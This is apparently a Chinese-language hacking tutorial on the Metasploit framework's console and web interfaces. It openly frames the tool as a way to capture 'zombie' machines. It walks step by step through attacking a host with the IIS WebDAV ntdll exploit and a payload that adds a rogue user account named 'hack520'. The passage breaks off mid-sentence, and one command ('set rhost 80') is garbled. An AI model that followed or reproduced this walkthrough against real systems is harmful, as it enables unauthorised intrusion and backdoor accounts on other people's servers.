Metasploit 是个好东西，实在想不到别的办法了，或许这东西能帮你一下，Metasploit包含了众多exploit，说不准还能用上几个，搞几台好肉鸡. 下载Metasploit双击进行安装，非常简单，一路回车就行了。安装完之后看下安装目录下的Msfconsole.bat和msfweb.bat,之一个是命令下的控制台。第二个是图形界面下的程序。现在我们先来看下命令行下的使用 *** ,运行后我们看到的是metasploit的欢迎界面，输入“？” 查看帮助，如图1 看到很多命令吧，我们来解释一下 “？” 帮助 “cd” :这个命令大家都熟悉，和WIN下面一样，切换目录 “exit” 这个就是退出的意思 “info”显示当前程序信息 “quit”退出程序 “reload”加载exploit和payloads “save”保存设置 “setg”设置一个环境变量 “show”显示当前可用的exploit “ use”选择一个exp “version”显示程序版本 这么多命令看起来肯定有些晕了吧其实用到的就"show" "info" "use"这3个，我们来看看是怎么使用的 这个程序就是一个大的工具包，集成了N多EXPLOIT,我们可以用show exploits看看有哪些exploit程序,如图2 看到了吧？这么多溢出程序，想用哪个就用哪个，省得整天找。这么多的东西该怎么用呢？？比如我想用一个溢出程序，肯定得先看他的帮助了解使用 *** 。这就得用到info命令啦。这个命令就是显示溢出程序的详细信息，比如我们想看下iis50_webdav_ntdll这个溢出程序的用法,就在命令行下输入info exploit iis50_webdav_ntdll,就会看到图3所示 这里只是查看Exploit的信息，我们还可查看shellcode的信息。在这个工具包中，可以定义自己需要的shellcode.在命令行下输入"show payloads"可以看到可用的shellcode列表，如图4 左边是名字，右边是说明。我们可以用info命令查看shellcode的具体信息，输入命令info payload cmd_generic如图5 这里要注意的只是required和options,这里required表示必选 options 表示可选可不选，以linux开头的就是针对linux系统的shellcode，以CMD和WIN开头的就是针对所有WIN系统。在溢出过程中一定要选对应的SHELLCODE才能成功。 好，现在我们来看实战一下，我们拿webdav的溢出程序做例子,在命令中输入use iis50_webdav_ntdll,然后再输入show options 查看要输入的内容，如图6 然后我们在命令行下输入set rhost 192.168.1.223 set rhost 80 如图7 到这里了，得指定shellcode，输入以下命令：set payload winexec输完了按回车然后再输入set cmd net user hack520 /add 如图8 好了现在可以向192.168.1.223发起进攻了，输入show targets 可以看到操作系统的代号，大家都知道webdav走针对2000系统，输入 set targets 0 如图9 没有什么问题了就输入Exploit。如果对方服务器存在这个漏洞话就会得到shell了 Metasploit下载： http://www.metasploit.com/tools/framework-2.7.exe http://www.securitycode.cn/framework-3.0.exe 图形界面下使用Metasploit Metasploit图形界面的使用 *** 和命令行下没有太大的区别，只不过是操作方式的不同罢了：到Metasploit的安装目录下找到Msfweb.bat文件双击运行，一会后程序提示执行成功，如图10所示： 图10然后打开IE，在地址栏中输入http://127.0.0.1:55555等一会后看到图11所示的IE窗口： 图11在想要使用的溢出工具包上单击鼠标左键后进入到基本设置窗口，我们仍然以iis50_webdav_ntdll为例，如图12所示： 图12单击“select payload”选项进入Payload选择界面，如图13所示： 图13选择合适的Payload后就进入基本信息的设定界面了，如图14所示： 图14这里的设置和命令行中介绍的是基本一致的，我就不做额外的说明了。都设定好后，你可以点Vulnerability Check检查看看目标系统有没有相应的漏洞，或者点Launch Exploit进行攻击！从上面的操作可以看出Metasploit的使用 *** 是非常简单的，而且功能也是很强大的，对于我们日常的渗透来说是一款很实用的工具。当然，你也许并不满足于软件自带的这些溢出工具，你完全可以自己向这个工具中添加任何你认为对你有用的溢出工具包。相信随着大家的努力，这个工具包可以更加完